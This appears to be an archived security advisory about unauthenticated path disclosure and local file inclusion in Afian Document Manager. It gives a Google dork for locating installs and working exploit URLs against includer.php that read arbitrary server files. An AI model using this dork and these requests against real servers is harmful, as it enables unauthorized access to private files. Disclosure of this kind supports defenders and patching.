AOH :: HP Unsorted A :: VA2737.HTM

Afian Document Manager Local File Inclusion



Afian Document Manager Local File Inclusion
Afian Document Manager Local File Inclusion



Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides an Web-based interface for documents residing on the Web server's file system.

This software has a secutity hole allow attackers download any files if they know the path.

Vendor: afian.com
Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion.
Version: Unknown (maybe 2.x.x)
Demo: http://demo.afian.com 

Exploit:
Google Dork: Afian document manager

1. Bypass+Fullpath Disclosure:
http://site/path/css/includer.php?files=NOT_EXIST_FILE 
It doesn't ask username/password and display fullpath.
2. Local File Inclusion: Read any files if know exactly path_of_file
http://site/path/css/includer.php?files=PATH_TO_FILE 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.